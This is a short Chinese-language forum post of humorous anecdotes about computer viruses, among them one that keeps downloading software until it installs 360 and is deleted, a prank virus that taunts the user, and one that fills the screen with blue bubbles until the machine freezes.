上次在哪兒看到的來著。。。
一個會自動亂下東西的病毒。。。
遲早把你的電腦弄得滿滿當當。。。
直到有一天。。。
它下了個360。。。
被360查殺刪了。。。
(?_?)
有個病毒自稱「百度殺」
這麼霸氣的名字你怕不怕?
更霸氣的是它竟然還在我桌面上創建了個快捷方式,大言不慚寫著:百度殺 毒
救命,我的電腦中百度殺了!!!!最近電腦中毒了 看著看著視頻突然就自動重啟了 開機後兩秒鐘電腦桌面多了一堆殺毒軟體
=@~@=電腦屏幕突然變成黃圖,當時我驚的……下巴都快掉下來了。然後趕緊打開360,屏幕突然發生了變化「敢開360?我是霸王毒!」當時感覺自己又吃了一驚,隨後立馬狂笑起來。
後續是立馬送電腦做系統了,想起來當時視頻沖著自己,感覺做病毒的同學看見我的表情肯定笑的不要不要的。之所以猜他會看我,是因為他的病毒沒有那麼大的攻擊性,估計是初次學,來試手,很順便看看電腦對面中毒的人什麼反應……o(≧口≦)o
燙燙燙燙燙燙燙燙
以前電腦中過一個很漂亮的毒。
藍色的小氣泡從屏幕四角慢慢增加,然後屏幕只剩中間一點能看的時候就死機了。
我一直很想知道這是什麼病毒,到處問也沒人知道……
如果有知道,請在評論里留言告訴我,謝謝~
推薦閱讀: